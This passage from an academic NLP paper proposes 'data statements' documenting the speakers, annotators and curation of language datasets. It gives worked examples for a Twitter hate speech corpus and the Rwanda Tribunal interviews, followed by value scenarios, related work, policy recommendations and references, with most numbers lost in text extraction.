both younger ( – ) and older ( +) adult speak- ers, the majority of whom likely identify as white. no direct information is available about gender distribution or socioeconomic status of the speak- ers. it is expected that most, but not all, of the speakers speak english as a native language. d. annotator demographic this dataset includes annotations from both crowdworkers and experts. , crowdworkers were recruited through crowd flower, primarily from europe, south america and north america. beyond coun- try of residence, no further information is avail- able about the crowdworkers. the expert anno- tators were recruited specifically for their under- standing of intersectional feminism. all were in- formally trained in critical race theory and gender studies through years of activism and personal re- search. they ranged in age from – , included men and women, and gave their ethnicity as white european ( ), east asian ( ), middle east/turkey ( ), and south asian ( ). their na- tive languages were danish ( ), danish/english ( ), turkish/danish ( ), arabic/danish ( ), and swedish ( ). based on income levels, the expert annotators represented upper lower class ( ), mid- dle class ( ), and upper middle class ( ). e. speech situation all tweets were ini- tially published between april and decem- ber . tweets represent informal, largely asyn- chronous, spontaneous, written language, of up to characters per tweet. about % of the tweets were in reaction to a specific australian tv show (my kitchen rules) and so were likely meant for roughly synchronous interaction with other view- ers. the intended audience of the tweets was ei- ther other viewers of the same show, or simply the general twitter audience. for the tweets contain- ing racist hate speech, the authors appear to intend them both for those who would agree but also for people whom they hope to provoke into having an agitational and confrontational exchange. f. text characteristics for racist tweets the topic was dominated by islam and islamopho- bia. for sexist tweets predominant topics were the tv show and people making sexist statements while claiming not to be sexist. the majority of tweets only used one modality (text) though some included links to pictures and websites. g. recording quality n/a. h. other n/a. i. provenance appendix n/a. https://github.com/zeerakw/hatespeech https://github.com/zeerakw/hatespeech twitter hate speech short form this dataset includes labels for ∼ , english tweets from different locales (australia and north america be- ing well-represented) selected to contain a high prevalence of hate speech. the labels indicate the presence and type of hate speech and were pro- vided both by experts (mostly with extensive if informal training in critical race theory and gen- der studies and english as a second language) and by crowdworkers primarily from europe and the americas. [include a link to the long form.] . voices from the rwanda tribunal (vrt) voices from the rwanda tribunal is a collec- tion of video interviews in english and french with personnel from the international criminal tribunal for rwanda (ictr) comprising - hours of material with high quality transcrip- tion throughout (nathan et al., ; nilsen et al., ; friedman et al., ). the dataset can be downloaded from http://www. tribunalvoices.org. a. curation rationale the vrt project, funded by the united states national science foundation, is part of a research program on de- veloping multi-lifespan design knowledge (fried- man and nathan, ). 
it is independent from the ictr, the united nations, and the government of rwanda. to help ensure accuracy and guard against breeches of confidentiality, interviewees had an opportunity to review and redact any ma- terial that was either misspoken or revealed con- fidential information. a total of two words have been redacted. no other review or redaction of content has occurred. the dataset includes all pub- licly released material from the collection; as of the writing of this data statement ( september ) one interview and a portion of a second are currently sealed. b. language variety of the interviews, are conducted in english (en-us and international english on the part of the interviewees, en-us on the part of the interviewers) and in french and english, with the interviewee speaking inter- national french, the interviewer speaking english (en-us) and an interpreter speaking both. c. speaker demographic the interviewees ( women and men, all adults) are profession- this data statement was prepared based on information provided by co-author batya friedman. at the end of one interview, there is seconds of un- transcribed speech in kinyarwanda (rw). als working in the area of international justice, such as judges or prosecutors, and support roles of the same, such as communications, prison war- den, and librarian. they represent a variety of na- tionalities: argentina, benin, cameroon, canada, england, the gambia, ghana, great britain, in- dia, italy, kenya, madagascar, mali, morocco, nigeria, norway, peru, rwanda, senegal, south africa, sri lanka, st. kitts and nevis, sweden, tanzania, togo, uganda, and the us. their native languages are not known, but are presumably di- verse. the interviewers ( women and men) are informataion and legal professionals from dif- ferent regions in the us. all are native speakers of us english, all are white, and at the time of the interviews they ranged in age from early s to late s. the interpreters are language profes- sionals employed by the ictr with experience in- terpreting between french and english. their age, gender, and native languages are unknown. d. annotator demographic the initial transcription was outsourced to a professional transcription company, so information about these transcribers is unavailable. the english tran- scripts were reviewed by english speaking (en- us) members of the research team for accuracy and then reviewed a third time by an additional english speaking (en-us) member of the team. the french/english transcripts received a sec- ond and third review for accuracy by bi-lingual french/english doctoral students at the university of washington. because of the sensitivity of the topic, the high political status of some intervie- wees (e.g. prosecutor for the tribunal), and the in- ternational stature of the institution, it is very im- portant that interviewees’ comments be accurately transcribed. accordingly, the bar for quality of transcription was set extremely high. e. speech situation the interviews were conducted in autumn at the ictr in arusha, tanzania and in rwanda, face-to-face, as spoken language. the interviewers begin with a prepared set of questions, but most of the interaction is semi-structured. most generally, the speech situa- tion can be characterized as a dialogue, but some of the interviewees give long replies, so stretches may be better characterized as monologues. for the interviewees, the immediate interlocutor is the interviewer, but the intended audience is much larger (see part f below). 
http://www.tribunalvoices.org http://www.tribunalvoices.org f. text characteristics the interviews were intended to provide an opportunity for tri- bunal personnel to reflect on their experiences working at the ictr and what they would like to share with the people of rwanda, the interna- tional justice community, and the global public now, and years from now. professionals from all organs of the tribunal (judiciary, prosecu- tion, registry) were invited to be interviewed, with effort made to include a broad spectrum of roles (e.g. judges, prosecutor, defense counsel, but also the warden, librarian, language services). intervie- wees expected their interviews to be made broadly accessible. g. recording quality the video inter- views were recorded with high definition equip- ment in closed but not sound-proof offices. there is some background noise. h. other n/a i. provenance appendix n/a. vrt short form the data represents well- vetted transcripts of spoken interviews with personnel from the international criminal tri- bunal for rwanda (ictr) about their experience at the tribunal and reflections on international jus- tice, in international english ( interviews) and french ( interviews with interpreters). intervie- wees are adults working in international justice and support fields at the ictr; interviewers are adult information or legal professionals, highly fluent in en-us; and transcribers are highly edu- cated, highly fluent english and french speakers. [include a link to the long form.] . summary these sample data statements are meant to il- lustrate how the schema can be used to com- municate the specific characteristics of datasets. they were both created post-hoc, in communica- tion with the dataset curators. once data state- ments are created as a matter of best practice, how- ever, they should be developed in tandem with the datasets themselves and may even inform the cu- ration of datasets. at the same time, data state- ments will need to be written for widely used, pre-existing datasets, where documentation may be lacking, memories imperfect, and dataset cu- rators no longer accessible. while retrospective data statements may be incomplete, by and large we believe they can still be valuable. our case studies also underscore how curation rationales shape the specific kinds of texts in- cluded. this is particularly striking in the case of the hate speech twitter annotations, where the specific search terms very clearly shaped the spe- cific kinds of hate speech included and the ways in which any technology or studies built on this dataset will generalize. a tool for mitigating bias we have explicitly designed data statements as a tool for mitigating bias in systems that use data for training and testing. data statements are particu- larly well suited to mitigate forms of emergent and pre-existing bias. for the former, we see benefits at the level of specific systems and of the field: when a system is paired with data statement(s) for the data it is trained on, those deploying it are empowered to assess potential gaps between the speaker populations represented in the training and test data and the populations whose language the system will be working with. at the field level, data statements enable an examination of the en- tire catalog of testing and training datasets to help identify populations who are not yet included. 
all of these groups are vulnerable to emergent bias, in that any system would by definition have been trained and tested on data from datasets that do not represent them well. data statements can also be instrumental in the diagnosis (and thus mitigation) of pre-existing bias. consider again speer’s ( ) example of mexican restaurants and sentiment analysis. the information that the word vectors were trained on general web text (together with knowledge of what kind of societal biases such text might contain) was key in figuring out why the system consis- tently underestimated the ratings associated with reviews of mexican restaurants. in order to en- able both more informed system development and deployment and audits by users and others of sys- tems in action, it is critical that characterizations of the training and test data underlying systems be available. to be clear, data statements do not in and of themselves solve the entire problem of bias. rather, they are a critical enabling infrastructure. consider by analogy this example from friedman ( ) about access to technology and employ- ment for people with disabilities. in terms of computer system design, we are not so privileged as to determine rigidly the values that will emerge from the systems we design. but neither can we abdicate responsibility. for example, let us for the moment agree [. . . ] that disabled people in the work place should be able to access technology, just as they should be able to access a public build- ing. as system designers we can make the choice to try to construct a tech- nological infrastructure which disabled people can access. if we do not make this choice, then we single-handedly un- dermine the principle of universal ac- cess. but if we do make this choice, and are successful, disabled people would still rely, for example, on employers to hire them. (p. ) similarly, with respect to bias in nlp technology, if we do not make a commitment to data state- ments or a similar practice for making explicit the characteristics of datasets, then we will single- handedly undermine the field’s ability to address bias. in nlp, we expect proposals to come with some kind of evaluation. in this paper, we have demon- strated the substance and ‘writability’ of a data statement through two exemplars (§ ). however, the positive effects of data statements that we an- ticipate (and negative effects we haven’t antici- pated) cannot be demonstrated and tested a priori, as their impact emerges through practice. thus, we look to value sensitive design, which encour- ages us to consider what would happen if a pro- posed technology were to come into widespread use, over longer periods of time, with attention to a wide range of stakeholders, potential benefits, and harms (friedman et al., , ). we do this with value scenarios (nathan et al., ; czeskis et al., ). specifically, we look at two kinds of value scenarios: those concerning nlp technology that fails to take into account an appropriate match between training data and deployment con- text and those that envision possible positive as well as negative consequences stemming from the widespread use of the specific ‘technology’ we are proposing in this paper (data statements). envi- sioning possible negative outcomes allows us to consider how to mitigate such possibilities before they occur. . public health and nlp for social media this value scenario is inspired by jurgens et al. 
( ), who provide a similar one to motivate training language id systems on more represen- tative datasets. scenario. big u hospital in a town in the up- per midwest collaborates with the cs department at big u to create a twitter-based early warning system for infectious disease, called diseasealert. big u hospital finds that the system improves pa- tient outcomes by alerting hospital staff to emerg- ing community health needs and alerting physi- cians to test for infectious diseases that currently are active locally. big u decides to make the diseasealert project open source to provide similar benefits to hospi- tals across the anglophone world and is delighted to learn that city hospital in abuja, nigeria is ex- cited to implement diseasealert locally. big u supports city hospital with installing the code, in- cluding localizing the system to draw on tweets posted from abuja. over time, however, city hos- pital finds that the system is leading its physicians to order unnecessary tests and that it is not at all accurate in detecting local health trends. city hos- pital complains to big u about the poor system performance and reports that their reputation is be- ing damaged. big u is puzzled, as the diseasealert performs well in the upper midwest, and they had spent time localizing the system to use tweets from abuja. after a good deal of frustration and in- vestigation into big u’s system, the developers discover that the third-party language id compo- nent they had included was trained on only highly- edited us and uk english text. as a result, it tends to misclassify tweets in regional or non- standard varieties of english as ‘not english’ and therefore not relevant. most of the tweets posted by people living in abuja that city hospital’s sys- tem should have been looking at were thrown out by the system at the first step of processing. analysis. city hospital adopted big u’s open source diseasealert system in exactly the way big u intended. however, the documentation for the language id component lacked critical informa- tion needed to help ensure the localization process would be successful; namely, information about the training and test sets for the system. had big u included data statements for all system compo- nents (including third-party components) in their documentation, then city hospital it staff would have been positioned to recognize the potential limitation of diseasealert and to work proactively with big u to ensure the system performed well in city hospital’s context. specifically, in reviewing data statements for all system components, the it staff could note that the language id component was trained on data unlike what they were seeing in their local tweets and ask for a different lan- guage id component or ask for the existing one to be retrained. in this manner, an emergent bias and its concomitant harms could have been iden- tified and addressed during the system adaptation process prior to deployment. . toward an inclusive data catalog in § . we consider data statements in relation to a particular system. here, we explore their potential to enable better science in nlp overall. scenario. it’s and ‘data statement’ has become a standard section heading for nlp re- search papers and system documentation. hap- pily, reports of mismatch between dataset and community of application leading to biased sys- tems have decreased. 
yet, research community members articulate an unease regarding which lan- guage communities are and which are not part of the field’s data catalog — the abstract total collec- tion of data and associated meta-data to which the field has access — and the possibility for resulting bias in nlp at a systemic level. in response, several national funding bodies jointly fund a project to discover gaps in knowl- edge. the project compares existing data state- ments to surveys of spoken languages and system- atically maps which language varieties have re- sources (annotated corpora and standard process- ing tools) and which ones lack such resources. the study turns up a large number of language varieties lacking such resources; it also produces a precise list of underserved populations, some of which are quite sizable, suggesting opportunity for impactful intervention at the academic, industry and govern- ment levels. study results in hand, the nlp community em- barks on an intentional program to broaden the language varieties in the data catalog. public dis- cussions lead to criteria for prioritizing language varieties and funding agencies come together to fund collaborative projects to produce state of the art resources for understudied languages. over time, the data catalog becomes more inclusive; bias in the catalog, while not wholly absent, is sig- nificantly reduced and nlp researchers and devel- opers are able to run more comprehensive exper- iments and build technology that serves a larger portion of society. analysis. the nlp community has recognized critical limitations in the field’s existing data cat- alog, leaving many language communities un- derserved (bender, ; munro, ; jurgens et al., ). the widespread uptake of data statements positions the nlp community to docu- ment the degree to which it leaves out certain lan- guage groups and empower itself to systematically broaden the data catalog. in turn, individual nlp systems could be trained on datasets that more closely align with the language of anticipated sys- tem users, thereby averting emergent bias. fur- thermore, nlp researchers can more thoroughly test key research ideas and systems, leading to more reliable scientific results. . anticipating and mitigating barriers finally, we explore one potential negative out- come and how with care it might be mitigated: that of data statements as a barrier to research. scenario. in response to widespread uptake, in the association for computational linguis- tics (acl) proposes that data statements be stan- dardized and required components of research pa- pers. a standards committee is formed, open pub- lic professional discussion is engaged, and in a standard is adopted. it mandates data statements as a requirement for publication, with standard- ized information fields and strict specifications for how these should be completed to facilitate auto- mated meta-analysis. there is great hope that the field will experience increasing benefits from abil- ity to compare, contrast, and build complementary data sets. many of those hopes are realized. however, in a relatively short period of time papers from un- derrepresented regions abruptly decline. in addi- tion, the number of papers from everywhere pro- ducing and reporting on new datasets decline as well. 
distressed by this outcome, the acl con- the eu-funded project meta-net worked on identi- fying gaps at the level of whole languages for europe, pro- ducing a series of white papers each concerning one european language, available from http://www.meta- net.eu/whitepapers/overview, accessed august http://www.meta-net.eu/whitepapers/overview http://www.meta-net.eu/whitepapers/overview stitutes an ad hoc committee to investigate. a survey of researchers reveals two distinct causes: first, researchers from institutions not yet well represented at acl were having their papers desk- rejected due to missing or insufficient data state- ments. second, researchers who might otherwise have developed a new dataset instead chose to use existing datasets whose data statements could sim- ply be copied. in response, the acl executive de- velops a mentoring service to assist authors in sub- mitting standards-compliant data statements and considers relaxing the standard somewhat in order to encourage more dataset creation. analysis. with any new technology, there can be unanticipated ripple effects — data statements are no exception. here we envision two poten- tial negative impacts, which could both be miti- gated through other practices. importantly, while we recommend the practice of creating data state- ments, we believe that they should be widely used before any standardization takes place. further- more, once a degree of expertise in this area is built up, we recommend that mentoring be put in place proactively. community engagement and mentor- ing will also contribute to furthering ethical dis- course and practice in the field. . summary the value scenarios described here point to key upsides to the widespread adoption of data state- ments and also help to provide words of caution. they are meant to be thought-provoking and plau- sible, but are not predictive. importantly, the sce- narios illustrate how, if used well, data statements could be an effective tool for mitigating bias in nlp systems. related work we see three strands of related work which lend support to our proposal and to the proposition that data statements will have the intended effect: sim- ilar practices in medicine (§ . ), emerging, inde- pendent proposals around similar ideas for trans- parency about datasets in ai (§ . ), and proposals for ‘algorithmic impact statements’ (§ . ). . guidelines for reporting medical trials in medicine, the consort (consolidated stan- dards of reporting trials) guidelines were devel- oped by a consortium of journal editors, specialists in clinical trial methodology and others to improve reporting of randomized, controlled trials. they include a checklist for authors to use to indicate where in their research reports each item is han- dled and a statement explaining the rationale be- hind each item (moher et al., ). consort development began in , with the most recent release in . it has been endorsed by medi- cal journals. item a, ‘eligibility criteria for participants’ is most closely related to the concerns of this paper. characterizing the population that participated in the study is critical for gauging the extent to which the results of the study are applicable to particu- lar patients a physician is treating (moher et al., ). the inclusion of this information has also en- abled further kinds of research. for example, mbuagbaw et al. 
( ) argue that careful atten- tion to and publication of demographic data that may correlate with health inequities can facilitate further work through meta-analyses. in particu- lar, individual studies usually lack the statistical power to do the kind of sub-analyses required to check for health inequities, and failing to publish demographic information precludes its use in the kind of aggregated, meta-analyses that could have sufficient statistical power. this echoes the field- level benefits we anticipate for data statements in building out the data catalog in the value scenario in § . . . converging proposals at least three other groups are working in parallel on similar proposals regarding bias and ai. gebru et al. (in prep) propose ‘datasheets for datasets’, looking at ai more broadly (but including nlp); chmielinski and colleagues at the mit media lab propose ‘dataset nutrition labels’; and yang et al. ( ) describe ‘ranking facts’, a series of wid- gets that allow a user to explore how attributes in- fluence a ranking. of these, the datasheets pro- posal is most similar to ours in including a compa- rable schema. the datasheets are inspired by those used in computer hardware to give specifications, lim- http://www.consort-statement.org/ consort- , accessed july , http://www.consort-statement.org/ about-consort/endorsement-of-consort- statement, accessed july , http://datanutrition.media.mit.edu/, accessed april , http://www.consort-statement.org/consort- http://www.consort-statement.org/consort- http://www.consort-statement.org/about-consort/endorsement-of-consort-statement http://www.consort-statement.org/about-consort/endorsement-of-consort-statement http://www.consort-statement.org/about-consort/endorsement-of-consort-statement http://datanutrition.media.mit.edu/ its and appropriate use information for compo- nents. there is important overlap in the kinds of information called for in the datasheets schema and our data statement schema: for example, the datasheets schema includes a section on ‘motiva- tion for dataset creation’, akin to our ‘curation rationale’. the primary differences stem from the fact that the datasheets proposal is trying to ac- commodate all types of datasets used to train ma- chine learning systems and, hence, tends toward more general, cross-cutting categories; while we elaborate requirements for linguistic datasets and, hence, provide more specific, nlp-focused cate- gories. gebru et al. note, like us, that their pro- posal is meant as an initial starting point to be elaborated through adoption and application. hav- ing multiple starting points for this discussion will certainly make it more fruitful. . algorithmic impact statements several groups have called for algorithmic im- pact statements (shneiderman, ; diakopou- los, ; ai now institute, ), modeled af- ter environmental impact statements. of these ai now’s proposal is perhaps the most developed. all three groups point to the need to clarify infor- mation about the data: “algorithm impact state- ments would document [. . . ] data quality control for input sources” (shneiderman, , ); “one avenue for transparency here is to commu- nicate the quality of the data, including its accu- racy, completeness, and uncertainty, [. . . ] repre- sentativeness of a sample for a specific population, and assumptions or other limitations” (diakopou- los, , ); “aias should cover [. . . ] input and training data.” (ai now institute, ) however, none of these proposals specify how to do so. 
data statements fill this critical gap. recommendations for implementation data statements are meant to be something practi- cal and concrete that nlp technologists can adopt as one tool for mitigating potential harms of the technology we develop. for this benefit to come about, data statements must be easily adopted. in addition, practical uptake will require coordinated effort at the level of the field. in this section we briefly consider possible costs to writers and read- ers of data statements, and then propose strategies for promoting uptake. the primary cost we see for writers is time: with the required information to hand, writing a data statement should take no more than – hours (based on our experience with the case studies). however, the time to collect the information will depend on the dataset. the more speakers and an- notators that are involved, the more time it may take to collect demographic information. this can be facilitated by planning ahead, before the cor- pus is collected. another possible cost is that col- lecting demographic information may mean that projects previously not submitted to institutional review boards for approval must now be, at least for exempt status. this process itself can take time, but is valuable in its own right. a further cost to writers is space. we propose that data state- ments, even the short form ( – words), be exempt from page limits in conference and journal publications. as for readers, reviewers have more material to read and dataset (and ultimately system) users need to scrutinize data statements in order to deter- mine which datasets are appropriate for their use case. but this is precisely the point: data state- ments make critical information accessible that previously could only be found by users with great effort, if at all. the time invested in scrutiniz- ing data statements prior to dataset adoption is expected to be far less than the time required to diagnose and retrofit an already deployed system should biases be identified. turning to uptake in the field, nlp technolo- gists (both researchers and system developers) are key stakeholders of the technology of data state- ments. practices that engage these stakeholders in the development and promotion of data statements will both promote uptake and ensure that the ulti- mate form data statements take are responsive to nlp technologists’ needs. accordingly, we rec- ommend that one or more professional organiza- tions such as the association for computational linguistics convene a working group on data state- ments. such a working group would engage in several related sets of activities, which would collectively serve to publicize and cultivate the use of data statements: (i) best practices a clear first step entails de- veloping best practices for how data statements are produced. this includes: steps to take before collecting a dataset to facilitate writing an infor- mative data statement; heuristics for writing con- cise and effective data statements; how to incorpo- rate material from institutional review board/ethics committee applications into the data statement schema; how to find an appropriate level of de- tail given privacy concerns, especially for small or vulnerable populations; and how to produce data statements for older datasets that predate this prac- tice. in doing this work, it may be helpful to distill best practices from other fields, such as medicine and psychology, especially around collecting de- mographic information. 
(ii) training and support materials with best practices in place, the next step is providing train- ing and support materials for the field at large. we see several complementary strategies to undertake: create a digital template for data statements; run tutorials at conferences; establish a mentoring net- work (see § . ); and develop an on-line ‘how-to’ guide. (iii) recommendations for field-level policies there are a number of field-level practices that the working group could explore to support the uptake and successful use of data statements. funding agencies could require data statements to be in- cluded in data management plans; conferences and journals could not count data statements against page limits (similar to references) and eventually require short form data statements in submissions; conferences and journals could allocate additional space for data statements in publications; finally once data statements have been in use for a few years, a standardized form could be established. tech policy implications transparency of datasets and systems is essential for preserving accountability and building more just systems (kroll et al., ). due process provides a critical case in point. in the united states, for example, due process requires that cit- izens who have been deprived of liberty or prop- erty by the government be afforded the opportu- nity to understand and challenge the government’s decision (citron, ). without data statements or something similar, governmental decisions that are made or supported by automated systems de- prive citizens of the ability to mount such a chal- lenge, undermining the potential for due process. in addition to challenging any specific decision by any specific system, there is a further concern about building systems that are broadly represen- tative and fair. here too, data statements have much to contribute. as systems are being built, data statements enable developers and researchers to make informed choices about training sets and to flag potential underrepresented populations who may be overlooked or treated unfairly. once sys- tems are deployed, data statements enable diag- nosis of systemic unfairness when it is detected in system performance. at a societal level, such transparency is necessary for government and ad- vocacy groups seeking to ensure protections and an inclusive society. if data statements turn out to be useful as an- ticipated, then the following implications for stan- dardization and tech policy likely ensue. long-form data statements required in system documentation. for academia, industry and gov- ernment, inclusion of long-form data statements as part of system documentation should be a require- ment. as appropriate, inclusion of long-form data statements should be a requirement for iso and other certification. even groups that are creating datasets that they don’t share (e.g. nsa) would be well advised to make internal data statements. moreover, under certain legal circumstances, such groups may be required to share this information. short-form data statements required for aca- demic and other publication. for academic pub- lication in journals and conferences, inclusion of short-form data statements should be a require- ment for publication. as highlighted in § . , cau- tion must be exercised to ensure that this require- ment does not become a barrier to access for some researchers. these two recommendations will need to be im- plemented with care. we have already noted the potential barrier to access. 
secrecy concerns may also arise in some situations, e.g., some groups may be willing to share datasets but not demo- graphic information, for fear of public relations backlash or to protect the safety of contributors to the dataset. that said, as consumers of datasets or products trained with them, nlp researchers, developers and the general public would be well advised to use systems only if there is access to the information we propose should be included in data statements. conclusion and future work as researchers and developers working on tech- nology in widespread use, capable of impacting people beyond its direct users, we have an obli- gation to consider the ethical implications of our work. this will only happen reliably if we find ways to integrate such thought into our regular practice. in this paper, we have put forward one specific, concrete proposal which we believe will help with issues related to exclusion and bias in language technology: the practice of including ‘data statements’ in all publications and documen- tation for all nlp systems. we believe this practice will have beneficial ef- fects immediately and into the future: in the short term, it will foreground how our data does and doesn’t represent the world (and the people our systems will impact). in the long term, it should enable research that specifically addresses issues of bias and exclusion, promote the development of more representative datasets, and make it easier and more normative for researchers to take stake- holder values into consideration as they work. in foregrounding the information about the data we work with, we can work toward making sure that the systems we build work for diverse populations and also toward making sure we are not teach- ing computers about the world based on the world views of a limited subset of people. granted, it will take time and experience to de- velop the skill of writing carefully crafted data statements. however, we see great potential ben- efits: for the scientific community, researchers will be better able to make precise claims about how results should generalize and perform more targeted experiments around reproducing results for datasets that differ in specific characteristics. for industry, we believe that incorporating data statements will encourage the kind of conscien- tious software development that protects compa- nies’ reputations (by avoiding public embarrass- ment) and makes them more competitive (by cre- ating systems used more fluidly by more people). for the public at large, data statements are one piece of a larger collection of practices that will enable the development of nlp systems that eq- uitably serves the interests of users and indirect stakeholders. acknowledgments we are grateful to the following people for help- ful discussion and critical commentary as we de- veloped this paper: the anonymous tacl review- ers, hannah almeter, stephanie ballard, chris curtis, leon derczynski, michael wayne good- man, anna hoffmann, bill howe, kristen how- ell, dirk hovy, jessica hullman, david inman, ta- dayoshi kohno, nick logler, mitch marcus, an- gelina mcmillan-major, rob munro, glenn slay- den, michelle stamnes, jevin west daisy yoo, olga zamaraeva, and especially zeerak waseeem and ryan calo. 
we have presented talks based on earlier versions of this paper at new york uni- versity (nov ), columbia university (nov ), university of washington (nov ), uc san diego (feb ), microsoft (mar ) and macquarie university (july ) and thank the audiences at those talks for useful feedback. fi- nally, batya friedman’s contributions to this paper were supported by the uw tech policy lab and national science foundation grant iis- . any opinions, findings, and conclusions or rec- ommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of the national science foundation. references ai now institute. . algorithmic impact assessments: toward accountable automation in public agencies. medium.com, https: //medium.com/@ainowinstitute/ algorithmic-impact-assessments- toward-accountable-automation- in-public-agencies-bd e fdde, accessed april . american psychological association. . pub- lication manual of the american psychological association, th edition. author, washington dc. emily m. bender. . on achieving and evalu- ating language independence in nlp. linguis- tic issues in language technology, : – . douglas biber. . dimensions of regis- ter variation: a cross-linguistic comparison. cambridge university press, cambridge. steven bird and gary simons. . white pa- per on establishing an infrastructure for open language archiving. in workshop on web- based language documentation and descrip- tion, philadelphia, pa, pages – . tolga bolukbasi, kai-wei chang, james y. zou, venkatesh saligrama, and adam t. kalai. . https://medium.com/@ainowinstitute/algorithmic-impact-assessments-toward-accountable-automation-in-public-agencies-bd e fdde https://medium.com/@ainowinstitute/algorithmic-impact-assessments-toward-accountable-automation-in-public-agencies-bd e fdde https://medium.com/@ainowinstitute/algorithmic-impact-assessments-toward-accountable-automation-in-public-agencies-bd e fdde https://medium.com/@ainowinstitute/algorithmic-impact-assessments-toward-accountable-automation-in-public-agencies-bd e fdde https://medium.com/@ainowinstitute/algorithmic-impact-assessments-toward-accountable-automation-in-public-agencies-bd e fdde man is to computer programmer as woman is to homemaker? debiasing word embeddings. in d. d. lee, m. sugiyama, u. v. luxburg, i. guyon, and r. garnett, editors, advances in neural information processing systems , pages – . curran associates, inc. nicoletta calzolari, valeria quochi, and claudia soria. . the strategic language resource agenda. http://www.flarenet.eu/ sites/default/files/flarenet_ strategic_language_resource_ agenda.pdf, accessed august . jack k. chambers and peter trudgill. . di- alectology, second edition. cambridge univer- sity press. danielle keats citron. . technological due process. washington university law review, : – . tei consortium. . tei p : guide- lines for electronic text encoding and in- terchange. http://www.tei-c.org/ guidelines/p /, accessed august . ben coppin. . artificial intelligence illumi- nated. jones & bartlett publishers, sudbury ma. alexei czeskis, ivayla dermendjieva, hussein yapit, alan borning, batya friedman, brian gill, and tadayoshi kohno. . parenting from the pocket: value tensions and techni- cal directions for secure and private parent-teen mobile safety. in proceedings of the sixth sym- posium on usable privacy and security. acm. leon derczynski, kalina bontcheva, and ian roberts. . broad twitter corpus: a di- verse named entity recognition resource. 
in proceedings of coling , the th inter- national conference on computational linguis- tics: technical papers, pages – . the coling organizing committee. laurence devillers, björn schuller, emily mower provost, peter robinson, joseph mariani, and agnes delaborde, editors. . proceedings of ethi-ca : ethics in corpus collec- tion, annotation & application. lrec. nicholas diakopoulos. . accountability in algorithmic decision making. communications of the acm, ( ): – . penelope eckert and john r. rickford, editors. . style and sociolinguistic variation. cambridge university press, cambridge. rod ellis. . the study of second language acquisition. oxford university press, oxford. susan ervin-tripp. . an analysis of the inter- action of language, topic, and listener. ameri- can anthropologist, ( _part ): – . karën fort, gilles adda, and k. bretonnel cohen, editors. . tal et ethique, special issue of traitement automatique des languages, volume : . batya friedman. . introduction. in batya friedman, editor, human values and the design of computer technology, pages – . stanford ca, stanford. batya friedman, david g hendry, and alan born- ing. . a survey of value sensitive de- sign methods. foundations and trends r© in human–computer interaction, ( ): – . batya friedman, peter h. kahn, jr., and alan borning. . value sensitive design and in- formation systems. in ping zhang and den- nis f. galletta, editors, human–computer in- teraction in management information systems: foundations, pages – . m. e. sharpe, ar- monk ny. batya friedman and lisa p. nathan. . multi- lifespan information system design: a research initiative for the hci community. in proceed- ings of the sigchi conference on human fac- tors in computing systems, pages – . acm. batya friedman, lisa p. nathan, and daisy yoo. . multi-lifespan information system de- sign in support of transitional justice: evolving situated design principles for the long(er) term. interacting with computers, : – . batya friedman and helen nissenbaum. . bias in computer systems. acm transactions on information systems (tois), ( ): – . john furler, parker magin, marie pirotta, and mieke van driel. . participant demograph- ics reported in “table ” of randomised con- trolled trials: a case of “inverse evidence”? in- ternational journal for equity in health, . http://papers.nips.cc/paper/ -man-is-to-computer-programmer-as-woman-is-to-homemaker-debiasing-word-embeddings.pdf http://papers.nips.cc/paper/ -man-is-to-computer-programmer-as-woman-is-to-homemaker-debiasing-word-embeddings.pdf http://www.flarenet.eu/sites/default/files/flarenet_strategic_language_resource_agenda.pdf http://www.flarenet.eu/sites/default/files/flarenet_strategic_language_resource_agenda.pdf http://www.flarenet.eu/sites/default/files/flarenet_strategic_language_resource_agenda.pdf http://www.flarenet.eu/sites/default/files/flarenet_strategic_language_resource_agenda.pdf http://openscholarship.wustl.edu/law_lawreview/vol /iss / http://openscholarship.wustl.edu/law_lawreview/vol /iss / http://www.tei-c.org/guidelines/p / http://www.tei-c.org/guidelines/p / http://aclweb.org/anthology/c - http://aclweb.org/anthology/c - https://doi.org/ . / https://doi.org/ . / https://doi.org/ . /iwc/iwv https://doi.org/ . /iwc/iwv https://doi.org/ . /iwc/iwv http://doi.org/ . / - - - http://doi.org/ . / - - - http://doi.org/ . / - - - timnit gebru, jamie morgenstern, briana vec- chione, jennifer wortman vaughan, hanna wallach, hal daumé iii, and kate craw- ford. in prep. datasheets for datasets. arxiv: . v . 
dirk hovy and anders søgaard. . tagging performance correlates with author age. in pro- ceedings of the rd annual meeting of the association for computational linguistics and the th international joint conference on natu- ral language processing (volume : short pa- pers), pages – . association for compu- tational linguistics. dirk hovy, shannon spruit, margaret mitchell, emily m. bender, michael strube, and hanna wallach, editors. . proceedings of the first acl workshop on ethics in natural lan- guage processing. association for computa- tional linguistics. dirk hovy and shannon l. spruit. . the so- cial impact of natural language processing. in proceedings of the th annual meeting of the association for computational linguistics (vol- ume : short papers), pages – . associa- tion for computational linguistics. anna jørgensen, dirk hovy, and anders søgaard. . challenges of studying and processing dialects in social media. in proceedings of the workshop on noisy user-generated text, pages – . association for computational linguis- tics. david jurgens, yulia tsvetkov, and dan jurafsky. . incorporating dialectal variability for so- cially equitable language identification. in pro- ceedings of the th annual meeting of the as- sociation for computational linguistics (vol- ume : short papers), pages – . association for computational linguistics. svetlana kiritchenko and saif mohammad. . examining gender and race bias in two hundred sentiment analysis systems. in proceedings of the seventh joint conference on lexical and computational semantics, pages – . asso- ciation for computational linguistics. dan klein and christopher d. manning. . accurate unlexicalized parsing. in proceedings of the st annual meeting of the association for computational linguistics, pages – . association for computational linguistics. roger kreuz and gina caucci. . lexical influences on the perception of sarcasm. in proceedings of the workshop on computational approaches to figurative language, pages – . association for computational linguistics. joshua a. kroll, joanna huey, solon barocas, ed- ward w. felten, joel r. reidenberg, david g. robinson, and harlan yu. . account- able algorithms. university of pennsylvania law review, . fordham law legal stud- ies research paper no. . available at ssrn: https://ssrn.com/abstract= , accessed august . william labov. . the social stratification of english in new york city. center for applied linguistics, washington, dc. bing liu. . sentiment analysis and opin- ion mining, volume : of synthesis lectures on human language technologies. morgan & claypool publishers. mitchell p. marcus, beatrice santorini, and mary ann marcinkiewicz. . building a large annotated corpus of english: the penn treebank. computational linguistics, : – . lawrence mbuagbaw, theresa aves, beverley shea, janet jull, vivian welch, monica tal- jaard, manosila yoganathan, regina greer- smith, george wells, and peter tugwell. . considerations and guidance in design- ing equity-relevant clinical trials. international journal for equity in health, ( ): . davida moher, sally hopewell, kenneth f. schulz, victor montori, peter c. gøtzsche, p. j. devereaux, diana elbourne, matthias eg- ger, and douglas g. altman. . con- sort explanation and elaboration: up- dated guidelines for reporting 